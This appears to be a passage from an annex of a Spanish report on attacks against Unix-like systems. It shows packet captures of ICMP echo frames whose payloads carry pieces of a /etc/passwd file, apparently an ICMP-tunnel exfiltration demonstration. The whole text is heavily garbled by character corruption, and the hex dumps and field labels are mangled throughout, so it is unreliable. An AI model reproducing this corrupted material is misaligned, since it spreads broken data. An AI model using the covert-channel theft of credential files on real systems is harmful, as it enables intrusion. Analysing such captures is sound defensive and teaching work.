Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0* de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7656+)5+616,+C303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Brame + 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D1f(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7656+)5+616,+C303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 0! 9+ 1e 63 3a (6 61 3a 6e 65 3a (9 7+ 00 6b 30 3a 6! (a 65 7( e1 39 00 6+ 3a (f (f 3a (7 3a a( 00 1f 6f 3a 7( 6( 30 61 (f (6 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 17 01 1( 76 30 7+ (f 3a 69 6f 31 )+ 01 56 3a 3a 6( 3a 6e 7+ 96 bf 00 +) +3 (f 61 30 (0 3a 5b !0 63 5+ 6) 75 73 3a 53 0a 1f a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 0( 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..:..e..1.-...<. ..t9..I......... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Brame 5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+6+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 00 00 00 61 30 73 3a 17 9+ 0( 63 3a 79 (f 31 !1 0) 6b +f 73 7( 96 bf 00 6+ 77 7+ 6f 5b 00 +6 6f 6e 65 6f 1f 00 +5 6f 65 67 7+ 00 +0 1) 7( 7( (0 3a 0! 01 1( (a (0 70 (f (9 37 0( 3a 6f 7( 75 e1 39 00 31 66 6f 73 a( !0 63 3a (0 63 7( (6 a) 6! 31 67 65 (f 0) 00 61 3a 61 73 73 00 1e 76 3a 6e 73 6( +5 !0 65 30 79 65 69 00 a) 6( 3a (0 73 6e ..1.-...:..e..<. ......I.79...... ....B<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *02 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


0070 00)0 0090 00a0 (f 7( 7+ 6e 6e 6f 6! 6f 67 69 6e 0a 6f 70 65 7( 61 7+ 6f 3a (a 3a 3( 3a 35 3a 3a 30 3a 30 3a 53 79 73 65 67 (0 (6 3a (f 3a (f 75 73 7( (f 73 6( 69 (f ;no"ogin.operato r:Q:(:5::0:0:.E tem e:;:;u r; bi n;

Brame 6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+e+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 73 3a (f 7( 7+ 6e 0! 9+ 1e 63 3a 79 (f 6e 3a 65 (f (9 7+ 00 6b +f 73 7( 6f (a 67 e1 3a 00 6+ 77 7+ 6f 6! 3a (0 a( 00 +e 6f 6e 65 6f 6f 3( (6 (6 00 +5 6f 65 67 7+ 67 3a 3a 00 +0 1) 7( 7( (0 3a 69 35 (f 17 01 1( (a (0 70 (f 6e 3a 3a 31 )+ 0( 3a 6f 7( 75 0a 3a (f 96 be 00 31 66 6f 73 6f 30 75 5b !0 63 3a (0 63 7( 70 3a 73 1f a) 6! 31 67 65 (f 65 30 7( 0) 00 61 3a 61 73 73 7( 3a (f 00 0( 76 3a 6e 73 6( 61 53 73 +5 !0 65 30 79 65 69 7+ 79 6( 00 a) 6( 3a (0 73 6e 6f 73 69 ..:..e..1.-...<. ..t:..I......... ....N<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin ;no"ogin.operato r:Q:(:5::0:0:.E tem e:;:;u r; bi n;

Brame 7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Dfb!) -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 69 6e 61 7( 7+ 30 (f 17 9+ 0( 63 6e 61 6e (f 79 3a 75 31 0f 0) 6b 3a 7( 6+ 73 3a 5+ 96 (7 00 6+ (a 69 (0 6( (a 7+ 5b 00 fb 6f 3a 65 53 69 3a 79 1f 00 !) 6f 33 73 6f 6e 3+ (0 00 +0 1) 7( 3a (0 75 (f 3a 53 0! 01 1( 6e 37 +3 7( 6e 36 61 (9 e9 03 6f 3a 6f 63 6f 35 6e e1 71 00 6! 3a 67 65 6! 35 6+ a( !0 63 6f 30 67 3a 6f 33 6( (6 a) 6! 67 3a 61 (f 67 33 6f 0) 00 61 69 30 6e 3a 69 3a 7) 00 1e 76 6e 3a 6+ (f 6e 3a 3a +5 !0 65 0a +( 73 75 0a 30 (f 00 a) 6( 6( 69 (0 73 7+ 3a 3a ..1.-...:..e..<. ...J..I......... ..........!"a@eb a!67oorno"ogin.b in:Q:3:7::0:0:Ci narie ,omman7 an7 .our!e:;:;u r; bin;no"ogin.t tE:Q:+:65533::0: 0:TtE .an7boD:;: ;u

Brame ) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D03!9 -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ 3b 00 00 +0 01 )+ b7 !0 a) 00 0( !0 a) ..:..e..1.-...<. ..tL..I.........

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0- de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 61 69 6e 61 7( 7+ 30 (f 1e 63 6e 61 6e (f 79 3a 75 00 6b 3a 7( 6+ 73 3a 5+ 00 6+ (a 69 (0 6( (a 7+ 03 6f 3a 65 53 69 3a 79 !9 6f 33 73 6f 6e 3+ (0 1) 7( 3a (0 75 (f 3a 53 1( 6e 37 +3 7( 6e 36 61 03 6f 3a 6f 63 6f 35 6e 00 6! 3a 67 65 6! 35 6+ 63 6f 30 67 3a 6f 33 6( 6! 67 3a 61 (f 67 33 6f 61 69 30 6e 3a 69 3a 7) 76 6e 3a 6+ (f 6e 3a 3a 65 0a +( 73 75 0a 30 (f 6( 6( 69 (0 73 7+ 3a 3a ..........!"a@eb a!67oorno"ogin.b in:Q:3:7::0:0:Ci narie ,omman7 an7 .our!e:;:;u r; bin;no"ogin.t tE:Q:+:65533::0: 0:TtE .an7boD:;: ;u

Brame 9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Db6e) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 17 9+ 0( 63 6! 35 61 69 3a 65 75 31 09 0) 6b 6f 35 6e 6e (a 73 96 1f 00 6+ 67 33 6+ (f 3a (0 5b 00 b6 6f 69 33 6( 6e 37 70 1f 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 0! 01 1( 73 6b 30 3a 6f 33 75 (9 ef 0+ 7( 67 3a (f 67 3a 6+ e1 79 00 (f 65 30 3a 69 3a 6f a( !0 63 73 67 3a (f 6e 30 (7 (6 a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 1e 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..1.-...:..e..<. ......I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u

Brame 10 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Dbee) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 0! 9+ 1e 63 6! 35 61 69 3a 65 75 (9 7+ 00 6b 6f 35 6e 6e (a 73 e1 3! 00 6+ 67 33 6+ (f 3a (0 a( 00 be 6f 69 33 6( 6e 37 70 (6 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 17 01 1( 73 6b 30 3a 6f 33 75 31 )+ 0+ 7( 67 3a (f 67 3a 6+ 96 b! 00 (f 65 30 3a 69 3a 6f 5b !0 63 73 67 3a (f 6e 30 (7 1f a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 0( 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..:..e..1.-...<. ..tT..I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u

Brame 11 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D)e0e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *01 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B67616D65733#(B75... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 6e 30 3a 6f 30 61 17 9+ 0( 63 75 0a 3a (f 67 3a 67 31 09 0) 6b 73 6e +e 3a 69 30 96 67 00 6+ 7( 65 65 (f 6e 3a 5b 00 )e 6f (f 77 77 75 0a +7 1f 00 0e 6f 73 73 73 73 67 69 00 +0 1) 7( 6( 3a (0 7( 61 73 0! 01 1( 73 69 (a 53 (f 6e 7+ (9 ef 05 7( 6e 3a 75 73 3a 65 e1 )b 00 (f (f 3) 6( 6( (a 7( a( !0 63 67 6e 3a 73 69 3a (0 (6 a) 6! 61 6f 3) 79 6e 39 +7 0) 00 61 67 6! 3a 73 (f 3a 61 00 1e 76 65 6f 3a 7+ 6e 39 6e +5 !0 65 73 67 30 65 6f 3a (0 00 a) 6( 3a 69 3a 67 6! 3a 50 ..1.-...:..e..<. ...m..I......... ..........!"a@eb a!67oor r;game : ;u r; bin;no"ogi n.ne> :Q:):)::0: 0:Ne> .ub E tem :;:;u r; bin;no" ogin.man:Q:9:9:: 0:0:3i ter 3an P ag

Brame 1( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D960e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B67616D65733#(B75... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 6e 30 3a 6f 30 61 0! 9+ 1e 63 75 0a 3a (f 67 3a 67 (9 7+ 00 6b 73 6e +e 3a 69 30 e1 37 00 6+ 7( 65 65 (f 6e 3a a( 00 96 6f (f 77 77 75 0a +7 (6 00 0e 6f 73 73 73 73 67 69 00 +0 1) 7( 6( 3a (0 7( 61 73 17 01 1( 73 69 (a 53 (f 6e 7+ 31 )+ 05 7( 6e 3a 75 73 3a 65 96 bb 00 (f (f 3) 6( 6( (a 7( 5b !0 63 67 6e 3a 73 69 3a (0 1f a) 6! 61 6f 3) 79 6e 39 +7 0) 00 61 67 6! 3a 73 (f 3a 61 00 0( 76 65 6f 3a 7+ 6e 39 6e +5 !0 65 73 67 30 65 6f 3a (0 00 a) 6( 3a 69 3a 67 6! 3a 50 ..:..e..1.-...<. ..t1..I......... ..........!"a@eb a!67oor r;game : ;u r; bin;no"ogi n.ne> :Q:):)::0: 0:Ne> .ub E tem :;:;u r; bin;no" ogin.man:Q:9:9:: 0:0:3i ter 3an P ag

Brame 13 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D5bb( -!orre!t0 87entifier: 0D1)1( .equen!e number: 1536 90D0600: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65733#(B75737((B736)61... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6) 69 (a 75 3a (f 67 17 9+ 0( 63 61 6e 3a 7( (f 73 73 31 01 0) 6b 7( (f 3( 65 76 6( 96 !a 00 6+ 65 6e 3( (0 61 69 5b 00 5b 6f (f 6f 3a 53 7( 6e 1f 00 b( 6f 67 6! 3( 6) (f (f 00 +0 1) 7( 61 6f 3( 65 65 6e 0! 01 1( 65 6e 67 3a 6! 67 6f (9 f7 06 73 3a 69 3a 6! 70 6! e1 (e 00 3a (f 6e 30 (0 7+ 6f a( !0 63 (f 75 0a 3a ++ 79 67 (6 a) 6! 75 73 73 30 61 3a 69 0) 00 61 73 7( 73 3a 65 (f 6e 00 1e 76 7( (f 6) 53 67 75 0a +5 !0 65 (f 73 6+ 65 6f 73 73 00 a) 6( 73 6( 3a 63 6e 7( 67 ..1.-...:..e..<. ......I......... ....-.....!"a@eb a!67oore :;u r; 'are;man:;u r; b in;no"ogin. '7: Q:((:((::0:0:.e! ure .'e"" Daemon :;@ar;emptE:;u r ; bin;no"ogin. m m

Brame 1+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o"

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *05 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D63b( -!orre!t0 87entifier: 0D1)1( .equen!e number: 1536 90D0600: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65733#(B75737((B736)61... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6) 69 (a 75 3a (f 67 0! 9+ 1e 63 61 6e 3a 7( (f 73 73 (9 7+ 00 6b 7( (f 3( 65 76 6( e1 3e 00 6+ 65 6e 3( (0 61 69 a( 00 63 6f (f 6f 3a 53 7( 6e (6 00 b( 6f 67 6! 3( 6) (f (f 00 +0 1) 7( 61 6f 3( 65 65 6e 17 01 1( 65 6e 67 3a 6! 67 6f 31 )+ 06 73 3a 69 3a 6! 70 6! 96 ba 00 3a (f 6e 30 (0 7+ 6f 5b !0 63 (f 75 0a 3a ++ 79 67 1f a) 6! 75 73 73 30 61 3a 69 0) 00 61 73 7( 73 3a 65 (f 6e 00 0( 76 7( (f 6) 53 67 75 0a +5 !0 65 (f 73 6+ 65 6f 73 73 00 a) 6( 73 6( 3a 63 6e 7( 67 ..:..e..1.-...<. ..t>..I......... ....!.....!"a@eb a!67oore :;u r; 'are;man:;u r; b in;no"ogin. '7: Q:((:((::0:0:.e! ure .'e"" Daemon :;@ar;emptE:;u r ; bin;no"ogin. m m

Brame 15 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D7156 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 17 9+ 0( 63 3a 6( 61 71 6e 3a 6e 31 )9 0) 6b 30 67 7( 75 6f (a 96 (0 00 6+ 3a 69 (f 65 6! 3a 5b 00 71 6f 30 73 73 75 6f 3( 1f 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 0! 01 1( 70 65 6f 6f (f 6e 3( (9 6f 07 3a 6e 6e 6! 75 0a 36 e1 7) 00 (a 6+ (0 (f 73 67 3a a( !0 63 3a 67 55 63 7( 61 3a (6 a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 1e 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..1.-...:..e..<. ... ..I.o....... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en

Brame 16 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D7956 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 0! 9+ 1e 63 3a 6( 61 71 6e 3a 6e (9 7+ 00 6b 30 67 7( 75 6f (a e1 3f 00 6+ 3a 69 (f 65 6! 3a a( 00 79 6f 30 73 73 75 6f 3( (6 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 17 01 1( 70 65 6f 6f (f 6e 3( 31 )+ 07 3a 6e 6e 6! 75 0a 36 96 b9 00 (a 6+ (0 (f 73 67 3a 5b !0 63 3a 67 55 63 7( 61 3a 1f a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 0( 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..:..e..1.-...<. ..t*..I......... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en

Brame 17 916( bEte

on >ire4 16( bEte

!apture7:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0J de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


<t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D65ff -!orre!t0 87entifier: 0D1)1( .equen!e number: (0+) 90D0)00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6+6D61696,(0++65666175... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 61 70 (f 6e +( 75 0a 17 9+ 0( 63 75 6f 73 6+ 69 73 70 31 9! 0) 6b 6! 6f 6( 3a 6e 7( 96 93 00 6+ 7+ 6! 69 (a 6+ (f 5b 00 65 6f (0 (f 6e 3a (0 73 1f 00 ff 6f 55 67 (f 35 53 6( 00 +0 1) 7( 73 71 6e 33 61 69 0! 01 1( 6+ 65 75 6f 3a 6e 6e (9 5! 0) 67 7( 65 6! 35 6+ (f e1 65 00 61 3a 75 6f 33 6( 6e a( !0 63 69 (f 65 67 3a 6f 6f (6 a) 6! 6! 76 3a 69 3a 7) 6! 0) 00 61 (0 61 (f 6e 30 3a 6f 00 1e 76 ++ 7( 75 0a 3a (f 67 +5 !0 65 65 (f 73 6( 30 3a 69 00 a) 6( 66 73 7( 69 3a (f 6e ..1.-...:..e..<. ......I.[e...... ....e.....!"a@eb a!67oor7mai" Def au"t K er:;@ar; poo";mqueue:;u r ; bin;no"ogin.bi n7:Q:53:53::0:0: Cin7 .an7boD:;:; u r; bin;no"ogin .p

